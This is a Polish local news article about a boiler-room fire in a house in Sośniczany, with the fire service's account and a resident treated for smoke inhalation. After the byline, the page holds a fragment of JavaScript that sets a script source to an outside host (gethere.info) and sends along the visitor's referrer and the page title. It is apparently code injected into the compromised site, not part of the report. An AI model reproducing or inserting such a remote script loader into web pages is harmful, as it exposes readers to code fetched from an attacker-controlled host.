W powiecie

Pożar kotłowni w Sośniczanach

Pożar kotłowni w Sośniczanach

Trzy zastępy straży pożarnej pracowały przy ugaszaniu pożaru kotłowni w Sośniczanach, w gminie Koprzywnica. Choć straty są poważne, mieszkańcom domu nic się nie stało.

Do zdarzenia doszło wczoraj, 18 stycznia około południa w domu jednorodzinnym w Sośniczanach. Wszystko wskazywało na pożar sadzy w kominie, jednak wkrótce później okazało się, że płonie kotłownia. Na miejsce udał się zastęp Jednostki Ratunkowo Gaśniczej z Sandomierza, OSP Koprzywnica i OSP Ciszyca. Mieszkańcy opuścili samodzielnie dom przed przybyciem służb ratunkowych. Prace strażaków polegały na ugaszeniu pożaru, dokładnym oddymieniu budynku mieszkalnego oraz dokładnym sprawdzeniu pogorzeliska.

-Dostaliśmy informacje, że w Sośniczanach doszło do pożaru sadzy w kominie. W trakcie dojazdu na miejsce zdarzenia okazało się, że nie jest to pożar sadzy ale pożar kotłowni w budynku mieszkalnym. Całe szczęście, że kotłownia nie była połączona bezpośrednio z budynkiem mieszkalnym, dlatego nie doszło do zadymienia domu, nie mniej jednak straty są bardzo duże – powiedział kpt. Sylwester Kochanowicz, oficer prasowy Komendy Powiatowej Państwowej Straży Pożarnej w Sandomierzu.

Jedna z domowniczek miała uciążliwy kaszel. Istniało prawdopodobieństwo, że podtruła się toksycznymi produktami spalania. Strażacy udzieli jej kwalifikowanej pierwszej pomocy i podali tlen. Po dojeździe na miejsce zespołu ratownictwa medycznego, lekarz zbadał kobietę i stwierdził, że nic nie zagraża jej zdrowiu i nie wymaga hospitalizacji.

Kinga Kędziora Palińska

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + '&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kliknij aby dodać komentarz

Zostaw komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

W powiecie

Więcej w W powiecie

Bezpieczeństwo podczas nadchodzącego weekendu

tsa24.com29 października 2021

Szarpanie za mundur i obelgi nie pomogły

tsa24.com29 października 2021

Wszystkich Świętych – Zmiana organizacji ruchu

tsa24.com29 października 2021

Koprzywnickie Bziuki- na Krajowej Liście Niematerialnego Dziedzictwa Kulturowego

tsa24.com26 października 2021

Dniówka w sadzie Wójta Gminy Samborzec odpracowana

tsa24.com26 października 2021

Zbiórka nakrętek dla małej Igi

tsa24.com26 października 2021

II miejsce dla KGW Klimontowianki za potrawę z gęsiny

tsa24.com22 października 2021

Bartuś Przychodzki zebrał kwotę na najdroższy lek świata !

tsa24.com21 października 2021

Złodzieje pracują też na cmentarzu. Zachowaj czujność !

tsa24.com19 października 2021